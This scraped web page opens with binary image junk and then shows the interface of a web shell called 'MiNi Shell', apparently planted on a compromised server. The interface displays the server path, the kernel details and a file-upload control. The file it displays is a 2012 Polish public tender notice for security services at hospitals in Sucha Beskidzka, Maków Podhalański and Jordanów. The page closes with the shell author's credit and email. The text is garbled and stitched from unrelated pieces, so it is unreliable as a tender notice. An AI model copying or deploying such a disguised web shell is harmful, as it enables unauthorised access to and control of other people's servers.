JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121011/392870-N-2012.html

<p class="kh_header"><b>Sucha Beskidzka: Usługi ochrony osób, mienia i obiektów Zespołu Opieki Zdrowotnej w Suchej Beskidzkiej tj. Szpitala Rejonowego w Suchej Beskidzkiej, Szpitala w Makowie Podhalańskim oraz Ambulatorium w Jordanowie</b><br>
<b>Numer ogłoszenia: 392870 - 2012; data zamieszczenia: 11.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul. Szpitalna 22, 34-200 Sucha Beskidzka, woj. małopolskie, tel. (033) 872 31 11, faks (033) 872 31 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsuchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi ochrony osób, mienia i obiektów Zespołu Opieki Zdrowotnej w Suchej Beskidzkiej tj. Szpitala Rejonowego w Suchej Beskidzkiej, Szpitala w Makowie Podhalańskim oraz Ambulatorium w Jordanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi:
ochrony osób, mienia i obiektów Zespołu Opieki Zdrowotnej w Suchej Beskidzkiej tj. Szpitala Rejonowego w Suchej Beskidzkiej, Szpitala w Makowie Podhalańskim oraz Ambulatorium w Jordanowie.
  1. Określenie przedmiotu usługi.
Usługa ochrony osób, mienia i obiektów w Zespole Opieki Zdrowotnej w Suchej Beskidzkiej obejmuje szereg działań mających na celu zapewnienie bezpieczeństwa całego terenu obiektu wraz z budynkami znajdującymi się na jego terenie (dotyczy to szpitala w Suchej Beskidzkiej, Szpitala w Makowie Podhalańskim oraz Ambulatorium w Jordanowie). Działania te polegają na pełnieniu stałych dyżurów na poszczególnych posterunkach oraz realizację obowiązków według wykazu jednostek poniżej.
2. Uszczegółowienie przedmiotu usługi dla jednostek w poszczególnych    
    miejscowościach.

SZPITAL W SUCHEJ BESKIDZKIEJ.
-Posterunek A
Czas pracy 24 h na dobę  - 7 dni w tygodniu, 1 pracownik ochrony fizycznej

1)	Otwieranie rampy wjazdowej:
-karetkom pogotowia ratunkowego i transportu sanitarnego
-każdemu pojazdowi, a następnie po dotarciu pojazdu przeprowadzenie wywiadu i udzielenie informacji o dalszym postępowaniu: 
           a) kieruje pacjenta (ew. osoby towarzyszące) do Segregacji 
               medycznej-Recepcji, 
           b) wskazuje miejsce postoju czasowego - do 15 min., 
           c) kieruje na inne miejsce postojowe z informacją o parkingu płatnym i 
               bezpłatnym, odnotowanie tego wjazdu w książce ruchu kołowego,
-lekarzom oraz ratownikom medycznym pełniącym dyżur pod telefonem.
2)	Poinformowanie pracowników Segregacji medycznej Recepcji (w godzinach 7.00-7.00) o przywiezieniu bądź przybyciu pacjenta.
3)	Wpuszczanie osób odwiedzających pacjentów leczonych w SOR za zgodą pielęgniarki dyżurnej.
-Otwieranie drzwi wejściowych do SOR (obszar zabiegowy, niezabiegowy, obserwacyjny)
4)	Otwieranie wjazdu do tzw. rękawa:
-karetkom pogotowia ratunkowego i transportu sanitarnego,
-pojazdom z pacjentem wymagającym przełożenia na wózek oraz powiadomienie personelu SOR o przywiezieniu pacjenta.
5)	Kontrola prawidłowego parkowania na terenie obiektu zgodnie z następującymi procedurami: 
-pojazdy po przywiezieniu pacjenta mogą pozostawać na parkingu przed wejściem do 15 minut, a następnie muszą zmienić miejsce parkowania na inny parking,
-karetki i pojazdy prywatne muszą opuścić rękaw natychmiast po przekazaniu pacjenta służbom medycznym. 
6)	Kontrola ruchu osobowego na terenie obiektu zgodnie z następującymi procedurami: 
-Osoby odwiedzające pacjentów winny być kierowane do wejścia głównego.
Wyjątek od tej reguły stanowią:
-osoby z przepustkami całodobowymi wydanymi przez ordynatorów   
     poszczególnych oddziałów w godzinach od 21.00 do 6.00, 
-osoby towarzyszące pacjentom przyjmowanym do szpitala,
-osoby odwiedzające nowoprzyjętych pacjentów po uzgodnieniu  telefonicznym z lekarzem dyżurnym oddziału w godzinach 21.00-6.00.
W sytuacjach wątpliwych należy skontaktować się z koordynatorem Szpitalnego Oddziału Ratunkowego, pielęgniarką koordynującą lub w razie ich nieobecności                                     z pielęgniarką dyżurną SOR.
7)	  Monitorowanie obiektu wokół Szpitala:
-reakcja na wszelkie nietypowe zdarzenia i nieprawidłowości
-w razie konieczności odblokowywanie drzwi wejściowych w bloku A                                                               
8)	 W godzinach od 21.00 do 6.00:
-obsługa centrali sygnalizacji pożaru CSP POLON 4800 zgodnie z instrukcją postępowania,
-obsługa instalacji oddymiania klatek schodowych bloków: łóżkowego                  i diagnostycznego  zgodnie z instrukcją postępowania,

9)	 Wydawanie kluczy od pomieszczenia do przechowywania zwłok i Pracowni Endoskopii Przewodu Pokarmowego. Odnotowanie tego faktu w książce raportów.
10)	 Kontrola ochraniaczy na obuwie zgodnie z obowiązującym standardem,
11)	 Zabezpieczenie i wydawanie kluczy od pomieszczeń za wpisem do książki wydania kluczy.
12)	 Natychmiastowa pomoc personelowi w przypadku agresywnych pacjentów i osób   odwiedzających, a w razie konieczności wezwanie grupy interwencyjnej.
13)	 Obserwacja kamer z systemu CCTV oraz reagowanie na wszelkie nietypowe zdarzenia i nieprawidłowości.
14)	 Kontrola oświetlenia zewnętrznego (zgłaszanie usterek).
15)	 Przyjęcie informacji o lądowaniu śmigłowca i zorganizowanie zabezpieczenia lądowiska.
-Posterunek B
          Czas pracy od poniedziałku do piątku od 6.00 - 15.00 - 2 pracowników
                                            Sobota-niedziela od 6.00 do 15.00- 1 pracownik
                        Od 15.00 - 21.00  - 7 dni w tygodniu - 1 pracownik
1)	Kontrola ruchu osobowego w godz. 6.00-15.00
2)	Kierowanie pacjentów do Poradni Specjalistycznych,
3)	Kierowanie osób odwiedzających pacjentów przebywających w oddziałach szpitalnych do wejścia na oddziały,
4)	Kontrola obuwia ochronnego osób odwiedzających szpital zgodnie z obowiązującym standardem
5)	Rzetelne i uprzejme informowanie oraz kierowanie osób wchodzących do bloku C  w  jaki sposób mogą dostać się w określone miejsca,
6)	Pomoc pacjentom przy korzystaniu z dźwigu zewnętrznego dla osób     niepełnosprawnych,	
7)	Otwieranie i zamykanie drzwi zewnętrznych:
-wejściowych (głównych blok C) - godziny otwarcia od 6.00 do 21.00
8)	Otwieranie i zamykanie drzwi wewnętrznych od strony wejścia głównego               w bloku  C:
-do bloku B- Pasaż Handlowy -  godziny otwarcia od 6.00 do 21.00
-do Przychodni Specjalistycznej - godziny otwarcia od 6.00 do 20.00
-wejście do szatni - poziom S-1 blok B- godziny otwarcia od 6.00 do 20.00 
9)	Zabezpieczenie i wydawanie kluczy do pomieszczeń za wpisem do książki wydania kluczy.
10)	Obsługa szatni (przyjmowanie i wydawanie odzieży osobom odwiedzającym pacjentów) godziny pracy szatni od 6.00 do 20.00.
11)	 Obsługa centrali sygnalizacji pożaru CSP POLON 4800 zgodnie z instrukcją postępowania.
12)	Obsługa instalacji oddymiania klatek schodowych bloków: łóżkowego, diagnostycznego zgodnie z instrukcją postępowania.
13)	Włączanie i wyłączanie wind osobowych w bloku C - godziny pracy wind od poniedziałku do piątku od 6.00 do 20.00, sobota i niedziela dla potrzeb pracowników szpitala i firmy ELMED.
14)	 Wypożyczanie wózków inwalidzkich.
15)	 Osobiste uczestnictwo pracownika ochrony przy pobieraniu odzieży zdeponowanej w szatni chorych w dni wolne od pracy.
16)	 W razie potrzeby otwieranie szlabanu na posterunku L w godzinach 21.00-6.00.
17)	Włączanie i wyłączania oświetlenia zewnętrznego Bloku C i wewnętrznego oświetlenia szpitala z pozycji posterunku B.
18)	 Jeden pracownik obsługuje sztanię i posterunek B. Drugi pracownik zobowiązany jest do pełnienia dyżuru w hallu Bloku C , pasażu i tarasie.
-Posterunek L (zaplecze - szlaban)
Czas pracy 6.00-6.00  - 7 dni w tygodniu- 1 pracownik ochrony fizycznej

1)	Obsługa bramy wjazdowej oraz kontrola i ewidencja pojazdów wjeżdżających zgodnie z wykazem zezwoleń.
2)	Prowadzenie patroli po terenie obiektu zgodnie z przyjętym harmonogramem i wg ustalonej trasy, potwierdzone w systemie kontroli obchodów typu GUARD.
3)	Sprawdzenie zabezpieczenia garaży Transportu Sanitarnego.
4)	Po zakończeniu pracy Transportu Sanitarnego przejęcie kluczy od pomieszczeń garażowych, wydawanie ich w razie potrzeby tylko osobom upoważnionym (odnotowanie wydania /zdania kluczy w książce gospodarki kluczami).
5)	Dbałość o swobodny dojazd do budynku Szpitala.
6)	Egzekwowanie prawa zakazu parkowania w miejscach niedozwolonych.
7)	Ogląd terenu wokół Szpitala za pomocą telewizji przemysłowej CCTV oraz reagowanie na wszelkie nietypowe zdarzenia i nieprawidłowości. 
8)	Otwieranie i zamykanie drzwi zewnętrznych:
-zaplecza gospodarczego (poziom S2) - godziny otwarcia od 6.00 do 19.30 (lub wg. potrzeb zaopatrzenia)
-przejścia służbowego (parter - od strony parku) - godziny otwarcia od 6.00 do 20.00
-zaplecza kuchennego tj. drzwi koło rampy - godziny otwarcia od 3.00 do 6.00 (w zależności od dostarczanego towaru, po każdej dostawie drzwi zamykane).
9)	 Sprawdzenie zabezpieczenia drzwi zewnętrznych.
10)	 Reagowanie na wszelkie zdarzenia na obiekcie.
11)	 Natychmiastowa pomoc personelowi w przypadku agresywnych pacjentów i osób odwiedzających.
12)	 Nadzorowanie i obsługa systemu zewnętrznego monitoringu telewizyjnego terenu Szpitala Rejonowego w Suchej Beskidzkiej.
     13) Ochrona parkingów zewnętrznych przed Blokiem C i koło kotłowni w godzinach
          19.00-7.00.
     
SZPITAL W MAKOWIE PODHALAŃSKIM.
		Czas pracy 24 h na dobę  - 7 dni w tygodniu

-Ochrona całego terenu szpitala wraz z parkingiem  
-Pełnienie dyżurów w posterunkach (portiernia) i wypełnianie obowiązków określonych poniżej:
1)	Zabezpieczenie i wydawanie kluczy (za wpisem do książki gospodarki kluczami) do pomieszczeń.
2)	Obsługa bramy wjazdowej wraz z kontrolą pojazdów wjeżdżających.
3)	Każdorazowe zamykanie bramy wjazdowej.
4)	Prowadzenie obchodów po całym terenie obiektu wg harmonogramu i po określonej trasie oraz odnotowywanie ich w systemie kontroli obchodów GUARD.
5)	Monitorowanie całego terenu wokół Szpitala.
6)	Dbałość o swobodny dojazd do budynku Szpitala.
7)	Zwracanie uwagi o zakazie parkowania w miejscach niedozwolonych.
8)	Obsługa centrali telefonicznej, ewidencjonowanie zamiejscowych rozmów telefonicznych stacjonarnych i komórkowych.
9)	 Udzielanie informacji osobom odwiedzającym o lokalizacji poszczególnych oddziałów.
10)	 Natychmiastowa pomoc personelowi w przypadku agresywnych pacjentów i osób odwiedzających, w razie potrzeby wezwanie grupy interwencyjnej.
11)	 Sprawdzenie zabezpieczenia drzwi zewnętrznych.
12)	 Reakcja na wszelkie nieprawidłowości na terenie obiektu.

AMBULATORIUM OPIEKI CAŁODOBOWEJ I MIEJSCE STACJONOWANIA ZRM W JORDANOWIE

Całodobowa ochrona poprzez:

1) Utrzymanie w gotowości grupy interwencyjnej,
2) Patrole prewencyjne w razie potrzeby na wezwanie oraz kontrolne zwłaszcza po
    Wyjeździe Zespołu Ratownictwa Medycznego, gdy obiekt pozostaje pusty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2. Koncesja wydana przez Ministra SWiA na działalność gospodarczą w zakresie usług ochrony osób i mienia na podstawie ustawy z 22.08.1997r. o ochronie osób i mienia                    (Dz.U. z 2005r. nr 145, poz. 1221 z póź. zm)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania wiedzy i doświadczenia,
2. W celu wykazania spełnienia warunku dotyczącego posiadania wiedzy i doświadczenia, Zamawiający wymaga, aby wykonawca wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej trzy usługi w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem i wartościom usługom stanowiącym przedmiot zamówienia tj. usługi muszą być wykonane lub wykonywane w zamkniętym zakładzie opieki zdrowotnej</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) sytuacji ekonomicznej i finansowej
W celu wykazania spełnienia warunku dotyczącego sytuacji ekonomicznej i finansowej spełnieniem będzie opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę min. 1.000.000,00 zł w zakresie prowadzonej działalności związanej z przedmiotem zmówienia, ważna na okres trwania umowy. W przypadku polisy zawartej na krótszy okres zamawiający wymaga dostarczenia nowej polisy do zamawiającego na co najmniej 5 dni przed upływem terminu obowiązywania poprzedniej polisy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Wysokość ulgi w składce PEFRON - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsuchabeskidzka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Zespołu Opieki Zdrowotnej , Blok B, IV piętro , ul. Szpitalna 22, 34-200 Sucha Beskidzka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2012 godzina 10:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej, Blok C, I piętro, ul.Szpitalna 22, 34-200 Sucha Beskidzka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com